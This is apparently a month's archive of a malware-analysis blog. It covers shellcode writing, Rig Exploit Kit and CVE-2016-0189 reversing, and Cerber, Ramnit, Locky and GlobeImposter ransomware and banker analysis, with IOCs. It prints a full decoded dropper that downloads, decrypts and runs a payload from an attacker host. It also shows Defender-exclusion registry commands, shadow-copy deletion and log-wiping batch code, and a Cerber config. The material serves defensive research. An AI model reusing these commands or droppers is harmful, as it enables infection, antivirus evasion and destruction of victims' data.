Month: August 2017

Let’s Learn: Preparing Shellcode in NASM

Goal: Create a neat shellcode without padded “00” in NASM for exploit bundling
Source: OpenSecurityTraining “Software Exploits”
Attempt I:

; ;;;;;;;;;;;;;;;;;;;;;;;; 
basic ‘Hello World’ in nasm
; compile with nasm -f elf hello.asm; ld -o hello hello.o
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; write(int fd, char *msg, unsigned int len)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 4
mov ebx, 1
mov ecx, msg
mov edx, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
; exit(int ret)
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov eax, 1
mov ebx, 0
int 0x80

Attempt II (change extended to lower byte register values):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .data
; ;;;;;;;;;;;;;;;;;;;;;;;;
msg db ‘Hello World’, 0xa
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 4
mov bl, 1
mov ecx, msg
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Attempt III (achieve code independence):
; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!! = 4f,77,6e,65,64,21,21,0xa
; push \n,!,!,d
push 0x0a212164
; push e,n,w,O
push 0x656e774f
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Attempt IV (remove 0xa newline):

; ;;;;;;;;;;;;;;;;;;;;;;;;
section .text
; ;;;;;;;;;;;;;;;;;;;;;;;;
global _start
; ;;;;;;;;;;;;;;;;;;;;;;;;
_start:
; ;;;;;;;;;;;;;;;;;;;;;;;;
; clear out the registers we need
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
; write(int fd, char *msg, unsigned int len)
mov al, 4
mov bl, 1
; Owned!! = 4f,77,6e,65,64,21,21,0xa
; push \n,!,!,d
push 0x21212164
; push e,n,w,O
push 0x656e774f
mov dl, 8
int 0x80
; ;;;;;;;;;;;;;;;;;;;;;;;;
mov al, 1
mov bl, 0
int 0x80

Cridex/Geodo/Emotet/Dridex Node Map Visualizer

Goal: Visualize all possible Cridex/Geodo/Emotet/Dridex node infections on the map using Fusion Map
Source: OSINT and other feed intel
https://fusiontables.google.com/embedviz?containerId=googft-gviz-canvas&viz=GVIZ&t=GRAPH&gc=true&gd=true&sdb=1&rmax=100000&q=select+col6%2C+col0%2C+col3+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&qrs=+where+col6+%3E%3D+&qre=+and+col6+%3C%3D+&qe=&uiversion=2&state=%7B%22ps%22%3A%221_2_-10_o_0_-a_-1f_95_y_5z_bg_-1h_1u_ae_-9_-d_am_-29_1l_ri_-2_5w_ql_-b_-q_o4_-1g_-j_5t_-t_-h_16_-x_1v_4n_-1w_-v_hi_-2k_o_pz_-3_56_y_f_a_nt_-2c_g_de_-28_3_f4_-2c_y_eg_-2p_17_eh_-x_29_n1_-1v_1m_qv_-2m_z_6s_-1o_28_5q_-y_-p_mw_-g_1u_kz_-23_18_n0_-1c_23_qn_-2s_s_e8_-21_-4_pe_-f_25_ox_-2o_2_rd_-25_-q_nh_-o_23_nd_-2m_1f_3b_-1t_-2d_7o_-2e_1t_62_-22_9_k1_-3_0_ia_-4_1k_px_3_1b_83_-23_1i_mq_-6_23_1c_-1m_-y_km_-2e_17_ma_-28_q_eq_-1z_1w_qt_-1c_2d_ad_-2_1t_2l_-1m_-a_qc_1x_52_qj_-19_66_l5_a_15_nv_5_g_gv_-o_2l_m0_-2h_24_gg_-l_2d_17_j_1s_j7_-o_2u_gw_-y_-17_4m_3_-i_qq_1e_5g_w_-22_-1c_5i_k_x_30_1_-3y_pv_a_63_qi_1t_5i_3s_-8_-4k_t_-30_-9_2a_-x_-2p_l3_7_-1g_56_i_-26_3u_24_-a_3v_1p_-q_no_1e_-1e_q3_-1j_3s_12_1p_3_5g_f_-4i_4s_r_-6_og_-y_2j_5p_-2g_-c_53_-2l_-j_3k_-s_-y_2x_s_-4e_8o_-1m_2i_63_-2i_-1g_i_2f_-34_3l_1l_-1c_ag_-2k_2f_p9_-2a_2c_61_-3n_1r_nb_-1u_3q_q_-24_2k_84_a_2o_5n_v_3_la_g_-1s_iw_0_-1s_3g_-1e_-1s_es_-o_-1s_er_-x_-1h_bo_-31_-18_pd_-u_5r_1w_-32_1s_p_-3j_2p_2v_12_12_1v_-33_f_e_-3e_24_j1_-2b_-1a_67_-a_2g_gn_-1s_-1e_73_-1_2e_e9_-2t_2f_b5_29_1g_dk_-16_2m_m6_-2q_-27_3r_-1y_-4b_mo_3_-z_ek_-2a_-2f_ev_-49_-3_d4_-2c_33_92_-1f_2p_fs_-2w_1z_l7_-32_1b_ay_-36_-f_eo_-1m_-1m_aw_-2x_1k_at_-2c_3q_r2_-2g_-11_qz_27_13_jm_-1w_3x_9k_-3s_-18_9j_-1_-1z_jn_u_3i_dl_-1n_2t_4q_-2b_-45_8v_-4d_11_au_-2x_5_49_9_-5_7t_-2q_-z_6h_-3c_13_2o_-28_-1j_3d_1y_-y_3_-3x_-14_34_-1d_-t_4y_-37_20_65_1r_1s_bs_-4d_1h_46_26_1r_nu_-2_-q_32_22_-r_ow_14_6l_p3_24_6h_p2_-8_6h_oz_a_6t_ol_o_-1t_a_-p_-2g_m2_1i_2f_5s_-3l_14_kq_1y_1e_94_-f_-2f_j0_%22%2C%22cx%22%3A20.806092585307955%2C%22cy%22%3A-17.32674591826775%2C%22sw%22%3A1554.5151079090979%2C%22sh%22%3A679.3283956242936%2C%22z%22%3A0.25048044372185396%7D&gco_forceIFrame=true&gco_hasLabelsColumn=true&att=true&width=800&height=500 https://fusiontables.google.com/embedviz?q=select+col1+from+1uZfgN0_tazPf9UVoIIiptra5ByDAanDFIcGX384g&viz=MAP&h=false&lat=28.269753263159743&lng=-6.4424593749999985&t=3&z=2&l=col1&y=2&tmplt=2&hml=TWO_COL_LAT_LNG 

Heatmap Node Map

Let’s Learn: In-Depth Reversing Rig Exploit Kit’s VBScript Memory Corruption (CVE-2016-0189)

Goal: Reverse the latest exploit payload (CVE-2016-0189) from the Rig Exploit Kit (RigEK) and its chain leading to Ramnit banker based on the user-agent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).
Source: Seamless gate leading to RigEK and Ramnit banker.
Tools: Fiddler, Internet Explorer, Firefox Web-Developer plugin



The observed URI parameters are from thee RigEK URI 81.177[.140.137 (AS8342 RTCOMM-AS, RU):

  • NjA0MjE0/NDg3NDE4
  • mano
  • pano
  • gift
  • work
Background
While investigating the Rig EK observed its served exploit CVE-2016-0189 (VBScript Memory Corruption) based on the user-agent string “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E).” Previously, the same exploit kit was serving the Rig EK CVE-2015-8651 Adobe Flash exploit based on the same user-agent string.

Steps:
(1) Obtain the RigEK response from Fiddler.
(2) Debug the payload in Web-Developer plugin by setting up the breakpoint on bx or return and copying the decoded payload.


(3) Observe the full decoded VBS code from RigEK’s CVE-2016-0189 function, which is almost an exact copy of the Github CVE-2016-0189 page (minus a few variable changes and change ShellExecute to Run functions for obfuscation purposes). In this matter, CVE-2016-0186 is also known as  “Scripting Engine Memory Corruption Vulnerability.”


(4) Finally, observe the Ramnit banker drop from the RigEK leveraging the exploit.

The CVE-2016-0189 exploit allows remote code execution and transfers control to the following decoded beatified cmd command that downloads an encoded binary, decrypts, and runs the Ramnit banker as follows:


 cmd.exe / q / c cd / d “%tmp%” && echo

function O(l) {
    var w = “pow”,
        j = 4 * 9;
    return A.round((A[w](j, l + 1) – A.random() * A[w](j, l))).toString(j)[“slice”](1)
};

function V(k) {
    var y = a(e + “.” + e + “Request.5.1”);
    y.setProxy(n);
    y.open(“GET”, k(1), 1);
    y.Option(n) = k(2);
    y.send();
    y.WaitForResponse();
    if (200 == y.status) return _(y.responseText, k(n))
};

function _(k, e) {
    for (var l = 0, n, c = [], F = 5 + 5 * 50, S = String, q = [], b = 0; 256 ^ > b; b++) c[b] = b;
    for (b = 0; 256 ^ > b; b++) l = l + c[b] + e.charCodeAt(b % e.length) ^ & F, n = c[b], c[b] = c[l], c[l] = n;
    for (var p = l = b = 0; p ^ < k.length; p++) b = b + 1 ^ & F, l = l + c[b] ^ & F, n = c[b], c[b] = c[l], c[l] = n, q.push(S.fromCharCode(k.charCodeAt(p) ^ ^ c[c[b] + c[l] ^ & F]));
    return q.join(“”)
};
try {
    u = WScript, o = “Object”, A = Math, a = Function(“b”, “retu” + “rn u.Create” + o + “(b)”);
    P = (“” + u).split(” “)[1], M = “indexOf”, q = a(P + “ing.FileSystem” + o), m = u.Arguments, e = “WinHTTP”, Z = “cmd”, U = “DEleTefIle”, j = a(“W” + P + “.Shell”), s = a(“ADODB.Stream”), x = O(8) + “.”, p = “exe”, n = 0, K = u[P + “FullName”], E = “.” + p;
    s.Type = 3 – 1;
    s.Charset = “iso-8859-1”;
    s.Open();
    try {
        v = V(m)
    } catch (W) {
        v = V(m)
    };
    d = v.charCodeAt(20 + 1 + v[M](“PE\x00\x00”));
    s.WriteText(v);
    h = “dll”;
    if (31 ^ < d) {
        var z = 1;
        x += h
    } else x += p;
    s.savetofile(x, 2);
    s.Close();
    C = ” /c “;
    Y = “gsvr32”;
    z ^ & ^ & (x = “re” + Y + E + ” /s ” + x);
    j.run(Z + E + C + x, 0)
} catch (N) {};
q[U](K); > o32.tmp && start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)” “http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


The shortened relevant function is as follows (commented):

start wscript //B //E:JScript o32.tmp “wexykukusw” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)”http://81.177.140%5B.%5D137/?NDg3NDE4&mano=%5BREDACTED%5D&pano=%5BREDACTED%5D&work=MzY0MzM0NjY=&#8221;


Indicators of Compromise (IOCs):
08-15-2017 – RigEK server 81.177.140[.]137 (AS8342 RTCOMM-AS, RU)
08-15-2017 – RigEK exploit CVE-2016-0189 landing
SHA-1: 7993998d5f50bb7a3f8575fdfdb93f3386dbacde
Link
08-15-2017 – Ramnit Banker 
SHA-1: 667d40d8c7c10f027ac57e91c509ddd56b8bc736


Let’s Learn: How to Obtain Cerber (CRBR) Ransomware Configuration

Goal: Learn obtaining Cerber ransomware, or CRBR encryptor, configuration leveraging its string compare function StrCmpNIA from SHLWAPI.dll. 
SourceMalwarebytes

SHA-1: 4BDD366D8EE35503CF062AE22ABE5A4A2D8D8907 
ToolollyDbgCFF Explorer

Background:
This reversing technique is based on source-code level understanding of the Cerber string parsing function leveraging library “SHLWAPI.” The initial discovery is based on source-code level understanding of the ransomware.
Steps:
  • Observe the malware in CFF Explorer and its import address table (IAT). Note that the malware does not contain the above referenced SHLWAPI library; therefore, we have to wait until the malware loads this library dynamically.
  • Go to “Options” -> “Events” and set up a check on “Break on new module (DLL)”
  • Observe the loaded SHLWAPI library in the DLL section.
  • Go to “Expression to follow” and enter “StrCmpNIA” and remove the initial check on “Break on new module (DLL)”
  • Run until you observe the StrCmpNIA function with the following call:
0012FB84   00403DBA  /CALL to StrCmpNIA
0012FB88   0129DCD0  |S1 = “{“blacklist”:…}”
0012FB8C   01299548  |S2 = “NULL”
0012FB90   00000004  \N = 4
  • Backup and save the data to file. Enjoy!
Here is the full extracted Cerber config:

{“blacklist”:{“files”:[“bootsect.bak”,”iconcache.db”,”ntuser.dat”,”thumbs.db”],”folders”:[“:\\$getcurrent\\”,”:\\$recycle.bin\\”,”:\\$windows.~bt\\”,”:\\$windows.~ws\\”,”:\\boot\\”,”:\\documents and settings\\all users\\”,”:\\documents and settings\\default user\\”,”:\\documents and settings\\localservice\\”,”:\\documents and settings\\networkservice\\”,”:\\intel\\”,”:\\logs\\”,”:\\msocache\\”,”:\\perflogs\\”,”:\\program files (x86)\\”,”:\\program files\\”,”:\\programdata\\”,”:\\recovery\\”,”:\\recycled\\”,”:\\recycler\\”,”:\\system volume information\\”,”:\\system.sav\\”,”:\\temp\\”,”:\\windows.old\\”,”:\\windows10upgrade\\”,”:\\windows\\”,”:\\winnt\\”,”\\appdata\\local\\”,”\\appdata\\locallow\\”,”\\appdata\\roaming\\”,”\\local settings\\”,”\\public\\music\\sample music\\”,”\\public\\pictures\\sample pictures\\”,”\\public\\videos\\sample videos\\”,”\\tor browser\\”],”languages”:[1049,1058,1059,1064,1067,1068,1079,1087,1088,1090,1091,1092,2072,2073,2092,2115]},”check”:{“language”:1},”debug”:0,”default”:{“bchn”:”1GcnsLs7C31uuroNmUHwwbB5xQeNvm63Ee”,”site_1″:”tor2web-.org”,”site_2″:”onion.link”,”site_3″:”onion.nu”,”site_4″:”onion.cab”,”site_5″:”onion.to”,”tor”:”oqwygprskqv65j72″},”encrypt”:{“bytes_skip”:2048,”divider”:327680,”encrypt”:1,”files”:[[“.doc”,”.docx”,”.xls”,”.xlsx”,”.jpg”,”.jpeg”,”.pdf”,”.rar”,”.zip”,”.ppt”,”.pptx”,”.avi”,”.mpg”,”.mpeg”,”.wmv”]],”max_block_size”:16,”min_file_size”:3072,”multithread”:1,”network”:1,”rsa_key_size”:880,”threads_per_core”:1},”global_public_key”:”LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUF2a3R5NXFocUV5ZFI5MDc2RmV2cAowdU1QN0laTm1zMUFBN0dQUVVUaE1XYllpRVlJaEJLY1QwL253WXJCcTBPZ3Y3OUsxdHRhMDRFSFRyWGdjQXAvCk9KZ0JoejlONThhZXdkNHlaQm0yY29lYURHdmNHUkFjOWU3Mk9iRlEvVE1FL0lvN0xaNXFYRFd6RGFmSThMQTgKSlFtU3owTCsvRytMUFRXZzdrUE9wSlQ3V1NrUmI5VDh3NVFnWlJKdXZ2aEVySE04M2tPM0VMVEgrU29FSTUzcAo0RU5Wd2ZOTkVwT3BucE9PU0tRb2J0SXc1NkNzUUZyaGFjMHNRbE9qZWsvbXVWbHV4amlFbWMwZnN6azJXTFNuCnFyeWlNeXphSTVEV0JEallLWEExdHAyaC95Z2JrWWRGWVJiQUVxd3RMeFQyd01mV1BRSTVPa2hUYTl0WnFEMEgKblFJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0tCg==”,”help_files”:{“files”:[{“file_body”:”REDACTED”,”file_extension”:”.txt”}],”files_name”:”_HOW_TO_DECRYPT_MY_FILES_{RAND}_”,”run_by_the_end”:1},”self_deleting”:1,”servers”:{“statistics”:{“data_finish”:”e01ENV9LRVl9″,”data_start”:”e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=”,”ip”:[“15.42.13[.0/27″,”44.66.140[.0/27″,”87.98.176[.0/22″],”port”:6893,”send_stat”:1,”timeout”:255}},”wallpaper”:{“change_wallpaper”:1,”background”:139,”color”:16777215,”size”:13,”text”:”                     \n   CRBR ENCRYPT0R    \n                     \n\n  Y0UR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMP0RTANT FILES  \n  HAVE BEEN ENCRYPTED!  \n\n  The only way to decrypt your files is to receive  \n  the private key and decryption program.  \n\n  To receive the private key and decryption program  \n  go to any decrypted folder – inside there is the special file (*_R_E_A_D___T_H_I_S_*)  \n  with complete instructions how to decrypt your files.  \n\n  If you cannot find any (*_R_E_A_D___T_H_I_S_*) file at your PC,  \n  follow the instructions below:  \n\n  1. Download \”Tor Browser\” from https://www.torproject.org/ and install it.  \n  2. In the \”Tor Browser\” open your personal page here:  \n\n  http://{TOR}.onion/{PC_ID}  \n\n  Note! This page is available via \”Tor Browser\” only.  \n\n\n”},”whitelist”:{“folders”:[“\\bitcoin\\”,”\\excel\\”,”\\microsoft sql server\\”,”\\microsoft\\excel\\”,”\\microsoft\\microsoft sql server\\”,”\\microsoft\\office\\”,”\\microsoft\\onenote\\”,”\\microsoft\\outlook\\”,”\\microsoft\\powerpoint\\”,”\\microsoft\\word\\”,”\\office\\”,”\\onenote\\”,”\\outlook\\”,”\\powerpoint\\”,”\\steam\\”,”\\the bat!\\”,”\\thunderbird\\”,”\\word\\”]}}

08-10-2017 – Rig Exploit Kit Leads to Ramnit aka "demetra" Banker via CVE-2015-8651

Goal: Reverse the Rig Exploit Kit infection chain leading to Ramnit “demetra” banking Trojan.
Source: Malicious traffic
Tools: Fiddler, JPEXS, OllyDBG

Traffic Chain: 

Seamless gate ->
-> Rig EK Landing ->  
http://188.225.78%5B.%5D174/?MTUzNzcy&pan=..&man=..&work=..
-> Rig EK CVE-2015-8651 Adobe Flash exploit
http://188.225.78%5B.%5D174/?NDYzMzgw&pan=..&man=..&shop=..
-> Ramnit Payload
%TEMP%
-> Ramnit Payload (via its getexec command)


I. RigEK’s observed URI parameters are as follows (User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET4.0C; .NET4.0E)):

  • MTUzNzcy (base64 landing)
  • NDYzMzgw (base64 exploit)
  • man
  • pan
  • work
  • shop
II. Adobe Flash Player Exploit (CVE-2015-8651):
Upon successful exploitation of the integer overflow vulnerability (si32 and li32), the exploit runs a shellcode downloading and executing the Ramnit banker. See more here.
Interesting function name

cremea_freedom

Ramnit aka “demetra” banking Trojan (dropped in %TEMP%; concatenates :Zone.Identifier as svchost[.]exe to the string and attempts to remove it as an anti-analysis trick, and leverages User Account Control (UAC) bypass method using application compatibility databases based on sdbinst[.]exe):

  • AvTrust
  • Antivirus Trusted Module v2.0 (AVG, Avast, Nod32, Norton, Bitdefender)
  • XX’S
  • Chrome reinstall
  • Chrome reinstall module (x64-x86) v0.1
  • CookieGrabber
  • Cookie Grabber v0.2 (no mask)
  • FtpGrabber2
  • Ftp Grabber v2.0
  • XX’S
  • Hooker
  • Spy module (Zeus, SE, Rootkit, Ignore SPDY) v4
  • VNC IFSB
  • VNC IFSB x64-x86

Ramnit anti-virus exclusion registry script:

  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v svchost.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v consent.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rundll32.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v spoolsv.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v explorer.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v rgjdu.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  ” /v afwqs.exe /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.tmp /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.dll /t  REG_DWORD /d 0  
  • REG ADD “HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  ” /v *.exe /t  REG_DWORD /d 0 

Targets US-based financial institutions leveraging its webinjects (same as 8-7-2017):
Indicators of compromise (IOCs):
Rig EK Landing:
Rig EK CVE-2015-8651 Exploit Flash integer overflow vulnerability:

Ramnit initial:

Ramnit getexec payload: 

Let’s Analyze Locky ".diablo6" Ransomware

Goal: Review the latest Locky “.diablo6” campaign via stepping into user calls and reviewing relevant functions.
Source I: 
Packed Locky (SHA-1: b4dc5f5d47b87baa0be87afda5ccee1f00497984)
Source II:
Unpacked Locky first-layer (SHA-1: 5ed85179386ae994b5ed8ef3a60a2ec5134bd68a)

Tool: OllyDBG
Brief overview:

Locky ransomware appears to have altered its payload encryption and heavily leverages dynamic API loading when invoking calls as well as gzipped encoding traffic.

C2 (POST /checkupdate):

83.217.8[.]61, 31.202.130[.]9, 91.234.35[.]106

Locky extension

.diablo6

POST requests (now gzip-encoded):

&act=getkey &affid= .unknown..&serv=..&lang=..&corp=..&x64=..&v=2..&os=..&sp..id

Targeted extensions:

Locky instructions:

Let’s Learn: How to Unpack GlobeImposter ".726" Ransomware

Goal: Unpack GlobeImposter ransomware payload using WriteProcessMemory API buffer’s dump (check out the same method as Locky from the previous blog).
ToolollyDbgCFF Explorer, IDA Pro
Credit@dvk01uk
Malware SHA-256: 5b88544bebacba38708685b905a94742c7798bf64b6f90f46acbc3f6de4399e7
Original GlobeImposter sample:

Background
GlobeImposter ransomware utilizes a loader/patcher algorithm patching and unloading the decoded payload in memory.

Theory
GlobeImposter ransomware patches itself using CreateProcessA API setting the creation flag to CREATE_SUSPENDED and writing itself into the buffer via WriteProcessMemory API. Next, the ransomware process won’t be executed immediately; it does not start until called ResumeThread. So, the ransomware has time to patch in memory.

Practice:
I. Load Ollydbg and click “File” ->
II. Click “Go to” -> “Expression” -> Type “WriteProcessMemory” and set up a breakpoint on it using F2.
III. Run the process using F9 and follow buffer to observe the unpacked GlobeImposter in the dump section.
IV.  Then, click on “Backup” -> “Save data to file.”
V. Verify the exported payload and IAT in CFF Explorer. Profit!
VI. Enjoy analyzing the decoded payload in IDA Pro!
(1) Registry persistency:

HKEY\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\CertificatesCheck
(b) GlobeImposter vssadmin & host script:
  GetTempFileNameW(&PathName, L”__tmp”, 0, &TempFileName);
  lstrcatW(&TempFileName, L”.bat”);
  result = CreateFileW(&TempFileName, 0x40000000u, 0, 0, 2u, 0x80u, 0);
  v1 = result;
  if ( result != (HANDLE)-1 )
  {
    v2 = lstrlenA(“@echo off\r\nvssadmin.exe Delete Shadows /All /Quiet\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\nreg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\nreg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\ncd %userprofile%\\documents\\\r\nattrib Default.rdp -s -h\r\ndel Default.rdp \r\nfor /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””);
    WriteFile(
      v1,
      “@echo off\r\n”
      “vssadmin.exe Delete Shadows /All /Quiet\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\” /va /f\r\n”
      “reg delete \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\” /f\r\n”
      “reg add \”HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\”\r\n”
      “cd %userprofile%\\documents\\\r\n”
      “attrib Default.rdp -s -h\r\n”
      “del Default.rdp \r\n”
      “for /F \”tokens=*\” %1 in (‘wevtutil.exe el’) DO wevtutil.exe cl \”%1\””,
      v2,
      &NumberOfBytesWritten,
      0);
    CloseHandle(v1);
    result = (HANDLE)sub_4126D7(&TempFileName);
(c) RSA public encryption key function value:
 v18 = RSA_Encrypt_Function(
          “A57EEE174A1DBCC23CD0CC6045AF9E1CF07706D30588C86941DEC3DA5AA5483BBC85988DA7B18B5C18DA8BF09CC8AF7FD46E7DD57F729A”
          “3D122387BCFE8B86F7A1D051895CD8ABE50F52913C62729979155C7CEF78B114921691FD7F1E1B206B5F98700A053CF04DBE1C44A2D843”
          “EF0C85468F61ABCF5559FE56F124C383B538F4F16ADB61C42AB3B6BFBDDAB4ADC9CB9DFA615A6506CFCAA752C78B270C568B786FF9D50C”
          “A30E21C5431F83E4A2A7695C24BA262233F28D4253CB01C64410C246291DCE84147EB593730A90F013423DE1DFEA1823CCD07B82C36F6E”
          “EF0F6916219D036D395C4CEEC4FDF20CD997ABB3B8B1F2B6D4BBB5065E31516D7386BD23”,
          v15,
          0xC0u);

….
  v3 = lpString;
  memset(&v8, 0, 0x400u);
  memset(&v10, 0, 0x200u);
  sub_4108D0(&v12, v4);
  sub_40FBC8(&v11);
  sub_40FDEC(&v9);
  v5 = lstrlenA(“rsa_encrypt”);
  if ( !sub_40FB4F((int)&v11, (int)&v9, “rsa_encrypt”, v5) && !sub_40F391(&v14, v3) && !sub_40F391(&v15, “010001”) )
  {
    v13 = (unsigned int)(sub_40F4AA(&v14) + 7) >> 3;
    memmove(&v8, a2, a3);
    if ( sub_41028B(&v11, v6, a3, &v8, (int)&v10) )

      memset(&v10, 0, a3);
(d) Taskill function terminating the following processes:
  • “sql”
  • “outlook”
  • “ssms”
  • “postgre”
  • “1c”
  • “excel”
  • “word”
 memset(&StartupInfo, 0, 0x44u);
  StartupInfo.cb = 68;
  result = CreateToolhelp32Snapshot(2u, 0);
  v2 = result;
  if ( result != (HANDLE)-1 )
  {
    pe.dwSize = 556;
    Process32FirstW(result, &pe);
    do
    {
      v3 = (LPCSTR *)off_41B950;
      while ( 1 )
      {
        v4 = sub_4128DF(pe.szExeFile, 0);
        v5 = lstrlenW(pe.szExeFile);
        for ( i = 0; i < v5; i = v8 + 1 )
        {
          v7 = sub_40C31A((char *)v4[i]);
          v4[v8] = v7;
        }
        if ( StrStrA(v4, *v3) )
          break;
        ++v3;
        if ( (signed int)v3 >= (signed int)&unk_41B96C )
          goto LABEL_10;
      }
      v9 = HeapCreate(0, 0x1000u, 0);
      v10 = (CHAR *)HeapAlloc(v9, 0, 0x100u);
      wsprintfA(v10, “%d”, pe.th32ProcessID);
      lstrcpyA(&String1, “taskkill /F /T /PID “);
      lstrcatA(&String1, v10);
      CreateProcessA(0, &String1, 0, 0, 0, 0x8000000u, 0, 0, &StartupInfo, &ProcessInformation);
LABEL_10:
      ;
    }
    while ( Process32NextW(v2, &pe) );
    result = (HANDLE)CloseHandle(v2);
  }
  return result;
(d) Targeted exclusion extensions and README extortion message in Olly: